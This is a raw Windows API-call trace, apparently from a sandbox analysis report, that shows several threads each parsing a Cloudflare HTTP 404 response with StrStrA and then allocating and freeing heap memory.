[0318.346] GetProcessHeap () returned 0x740000 [0318.346] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 117 os_tid = 0x6e4 [0318.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.585] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:33 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=8B2HWCoTZIdzX4vd6B0TNF%2FuaXcASdINWCbBa5oCnuex84XUQVyIeCnsGHHFIIUgMPm%2Blz4plP3KkgqLv7Yl%2B0Ltbr7WJ9cLm7APmDeboiOsFUWWNjEsx4L1r7X4XQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db36765bb28905e-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0318.586] GetProcessHeap () returned 0x740000 [0318.586] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0318.586] GetProcessHeap () returned 0x740000 [0318.586] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0318.586] GetProcessHeap () returned 0x740000 [0318.586] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 118 os_tid = 0x164 [0318.808] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.809] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:33 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=3K8WyqZnBy%2BHZY%2ByZrL9CF8ls3iDcM5esjSSQ0Rm9Cspg8wCSpPMt%2BPIxy4fMq2uxMsMdeHnqq%2FVLK1U%2BXfU%2Fsc18OPiUa1QAgPOj3RYvGLpaj%2BRObZeXA0YQP6m9Q%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3676749819156-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0318.809] GetProcessHeap () returned 0x740000 [0318.809] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0318.809] GetProcessHeap () returned 0x740000 [0318.809] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0318.809] GetProcessHeap () returned 0x740000 [0318.809] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 119 os_tid = 0xe48 [0319.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.026] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:33 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VriD2s%2BoW2iI%2FoWqHk6umzPo9TpYTis%2B99j%2Fpr4OEkD5XCAuhdK1ztx5FFvGj5rLYlLFcBz6b1RHI%2FXLLz0Oods3GqKgIaCeRf9LKplgVbHFP1ar8xyyq82HzeL%2FNA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db36768bdbc92c9-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0319.026] GetProcessHeap () returned 0x740000 [0319.026] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0319.026] GetProcessHeap () returned 0x740000 [0319.026] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0319.026] GetProcessHeap () returned 0x740000 [0319.027] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 120 os_tid = 0x113c [0319.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0319.953] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:34 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=4cPhiqnfaaQwkSo0Xabunb0%2FWjzB0ptc33a3o0QToo4EaLsKsUxQOx7uqDRu0FaosWML8Ofd4eTn8rTNdlUPclsehSEZVeCBM%2FXM%2FeXJpgXC%2FStmZ67SBrl9TNi9aw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3676a1e4d9255-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0319.953] GetProcessHeap () returned 0x740000 [0319.953] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0319.954] GetProcessHeap () returned 0x740000 [0319.954] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0319.954] GetProcessHeap () returned 0x740000 [0319.954] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 121 os_tid = 0x578 [0320.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.167] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:34 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=cql%2BeV7IrvpHo3DHF2lhB9VWbAaLfEm5LJeArWE4WtLSnsNb6c5zqE%2FaeEA9hLahcIZVXbaisAwkzvn2p17yq0ZYB3cji4rzfbH9q%2BwhrZUcHQYrz9eoxZLNa99uOA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3676fdc9391f9-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0320.167] GetProcessHeap () returned 0x740000 [0320.167] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3e8 [0320.167] GetProcessHeap () returned 0x740000 [0320.167] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3e8 | out: hHeap=0x740000) returned 1 [0320.167] GetProcessHeap () returned 0x740000 [0320.168] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 122 os_tid = 0x1134 [0320.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.483] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:35 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VbvCKzSrIb1MwttyCc0j20ECpAyFkDg3TTNrzSf8h%2FZYcXnPZ9lLch2Wb2I2VWRf0RbIQgRtgTJiPOR373kx2K5CB5KnV8CT6HJ6yGQy7LxiPmFUP88eazLNdnQ5Ow%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367717f809267-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0320.483] GetProcessHeap () returned 0x740000 [0320.483] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0320.483] GetProcessHeap () returned 0x740000 [0320.483] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0320.483] GetProcessHeap () returned 0x740000 [0320.484] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 123 os_tid = 0x6b8 [0320.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.907] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:35 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=nwiHx6t2bnZnYmGqnRUbHUoFAJgqBUfx%2F27%2F7hbyo2FRo1NJdKHBPw2mqzhrqftBkmyC%2BWtwXDW2O1T0Wv9NbXxU%2FQ6%2BVXL314wsbNM8kE8JKZyozp53V9mAVGS%2BSQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db36773bde09031-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0320.907] GetProcessHeap () returned 0x740000 [0320.907] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0320.907] GetProcessHeap () returned 0x740000 [0320.907] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0320.907] GetProcessHeap () returned 0x740000 [0320.908] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 124 os_tid = 0x250 [0321.342] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.343] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:36 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=mUAe%2FyFt4vE%2FFop9kCJPZ1tZTY4he1q%2BuhnygjDYZW6wXmEFtgIH6vJ%2F1XBpBfxCRr3q7VZFBpUvrKIiCwhUnLKm6Z9PPXWLmsGwgDfrEikueDvJWaUxpk7s5Q8nzw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367768f28696f-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.343] GetProcessHeap () returned 0x740000 [0321.343] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0321.343] GetProcessHeap () returned 0x740000 [0321.343] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0321.343] GetProcessHeap () returned 0x740000 [0321.343] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 125 os_tid = 0x158 [0321.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.675] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:36 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=a8ZR3QzWqNvPTryj5WveZqAPxoyEQs7ouL5klKqIPPcd3E8Uxi502F%2FpVNtLmXJFYdDDh993Qw3igNUR0im%2BbQx5fya2uRzxkIBK0KwUxN4IW22P9OhzmWgJlKfIqw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367793a8a90dc-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0321.675] GetProcessHeap () returned 0x740000 [0321.675] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0321.675] GetProcessHeap () returned 0x740000 [0321.675] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0321.675] GetProcessHeap () returned 0x740000 [0321.676] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1